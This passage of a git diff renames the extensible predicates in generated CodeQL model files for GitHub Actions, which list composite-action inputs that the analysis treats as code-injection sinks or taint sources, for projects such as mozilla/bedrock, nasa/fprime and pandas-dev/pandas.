b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml index 8708afa3f3b..d85418c7a41 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mozilla/bedrock", "*", "input.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml index e4f1637603e..074cf066e37 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mozilla/sccache", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml index f8b636c4636..c4497b59af8 100644 --- a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml index f51d784d7c1..cc28e15a55b 100644 --- a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mumble-voip/mumble", "*", "input.arch", "code-injection", "generated"] - ["mumble-voip/mumble", "*", "input.type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml index ac6af801a0e..76fb41dadf1 100644 --- a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nasa/fprime", "*", "input.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml index fb676663019..b786a672140 100644 --- a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nats-io/nats-server", "*", "input.label", "code-injection", "generated"] - ["nats-io/nats-server", "*", "input.hub_password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml index 503386ea3d4..236ac8f2cd2 100644 --- a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nearform-actions/optic-release-automation-action", "*", "input.build-command", "code-injection", "generated"] - ["nearform-actions/optic-release-automation-action", "*", "input.actor-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml index 6d48d32e9fa..64207dbca6a 100644 --- a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nektos/act", "*", "input.test_input_optional", "code-injection", "generated"] - ["nektos/act", "*", "input.composite-input", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml index ae6d1fcc1e8..46de0ff86c6 100644 --- a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.project-name", "code-injection", "generated"] - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.gradle-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml index 48b98225721..a07b223777b 100644 --- a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neondatabase/neon", "*", "input.save_perf_report", "code-injection", "generated"] - ["neondatabase/neon", "*", "input.real_s3_region", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml index 14bfe57eb11..e3470982f53 100644 --- a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neovim/neovim", "*", "input.install_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml index 4b04351ab90..87535288d26 100644 --- a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml +++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nhost/nhost", "*", "input.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml index 755147a6f1a..28249c82428 100644 --- a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nix-community/nixos-wsl", "*", "input.filename", "code-injection", "generated"] - ["nix-community/nixos-wsl", "*", "input.expression", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml index 12017671b4e..8d1bbce631f 100644 --- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["novuhq/novu", "*", "input.tag", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["novuhq/novu", "*", "input.docker_name", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml index e3028cc1bb3..3c5f85a6e79 100644 --- a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml +++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nymtech/nym", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml index ab112bb5ec0..01a552361ec 100644 --- a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["obsproject/obs-studio", "*", "input.failCondition", "code-injection", "generated"] - ["obsproject/obs-studio", "*", "input.checkGlob", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml index 0d8ae4e102e..ab2e86ce868 100644 --- a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ocaml/dune", "*", "input.OCAML_COMPILER", "code-injection", "generated"] - ["ocaml/dune", "*", "input.DKML_COMPILER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml index 44156ddd670..8d6dd73bfd9 100644 --- a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oneflow-inc/oneflow", "*", "input.extra_flags", "code-injection", "generated"] - ["oneflow-inc/oneflow", "*", "input.python_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml index 693d456e4a5..a20cbb1e24d 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.gem", "code-injection", "generated"] - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml index 5e3dffbb7f5..62785bef86b 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby", "*", "input.gem", "code-injection", "generated"] - ["open-telemetry/opentelemetry-ruby", "*", "input.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml index 5d782529f7f..9c10a54abc7 100644 --- a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-watcom/open-watcom-v2", "*", "input.fullname", "code-injection", "generated"] - ["open-watcom/open-watcom-v2", "*", "input.buildcmd", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml index f7f845ac28f..4145ec19569 100644 --- a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openapitools/openapi-generator", "*", "input.args", "code-injection", "generated"] - ["openapitools/openapi-generator", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml index a58f033cc38..5b63c9fec06 100644 --- a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openjdk/jdk", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml index aefece4bebd..f21389b08b0 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opensearch-project/opensearch-net", "*", "input.version", "code-injection", "generated"] - ["opensearch-project/opensearch-net", "*", "input.build_script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml index 5cbcfc01879..1a6f42c25f6 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opensearch-project/security", "*", "input.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml index 0712838a737..ea48b84310c 100644 --- a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opentrons/opentrons", "*", "input.destPrefix", "code-injection", "generated"] - ["opentrons/opentrons", "*", "input.domain", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml index 5ab14ba453b..4e953d695f8 100644 --- a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_files_changed", "code-injection", "generated"] - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_labels_set", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml index 564961fc600..32040ef84ea 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.layout", "code-injection", "generated"] - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.out_layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml index 8876184a0c1..b258ea1ce2d 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts", "*", "input.layout", "code-injection", "generated"] - ["openzeppelin/openzeppelin-contracts", "*", "input.out_layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml index 7a389e89e53..c0a51345ae6 100644 --- a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml +++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oppia/oppia", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml index ca23beb6e04..f362cd1f72b 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oracle/graal", "*", "input.components", "code-injection", "generated"] - ["oracle/graal", "*", "input.native-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml index 9ddc6606a6d..35474e6c68f 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml index cd04e9c8b34..ce961ee6a75 100644 --- a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml index d986c331226..9ad4bb30666 100644 --- a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] - ["oven-sh/bun", "*", "input.bun-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml index 9b30c6599c1..5fca46427e0 100644 --- a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["owntracks/android", "*", "input.name", "code-injection", "generated"] - ["owntracks/android", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml index 0089d9ca75d..9f0fecbe10b 100644 --- a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] - ["pandas-dev/pandas", "*", "input.editable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml index d64d7c38a01..cadf01dbff1 100644 --- a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"] - ["pardeike/harmony", "*", "input.build_configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml index 55a87e2df67..ec4fc1da053 100644 --- a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"] - ["pennylaneai/pennylane", "*", "input.additional_pip_packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml index 158aafbd115..e6530a19d97 100644 --- a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"] - ["phalcon/cphalcon", "*", "input.ext-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml index ff12a54e97a..0bae4e91cde 100644 --- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"] - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml index 1a92afe11a4..0acb53ba1d3 100644 --- a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["php/php-src", "*", "input.jitType", "code-injection", "generated"] - ["php/php-src", "*", "input.runTestsParameters", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml index 38f2399b368..f1b755e796b 100644 --- a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"] - ["phpdocumentor/phpdocumentor", "*", "input.secret-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml index 36e983b8039..7d1733d647a 100644 --- a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"] - ["pinecone-io/pinecone-python-client", "*", "input.protobuf_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml index 006a53e8376..4bf33c9a343 100644 --- a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml index 5410cb3ff30..9ca004a7c15 100644 --- a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["posthog/posthog", "*", "input.group", "code-injection", "generated"] - ["posthog/posthog", "*", "input.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml index 124b3cf2a5a..fc3870d89a8 100644 --- a/ql/lib/ext/generated/composite-actions/primer_react.model.yml +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["primer/react", "*", "input.token", "code-injection", "generated"] - ["primer/react", "*", "input.schedule-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml index 8542583f3d9..1d621562771 100644 --- a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"] - ["project-chip/connectedhomeip", "*", "input.action", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml index e85e58fb40a..f09b364127e 100644 --- a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"] - ["projectnessie/nessie", "*", "input.java-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml index d2005f3788a..56e7b814231 100644 --- a/ql/lib/ext/generated/composite-actions/psf_black.model.yml +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: 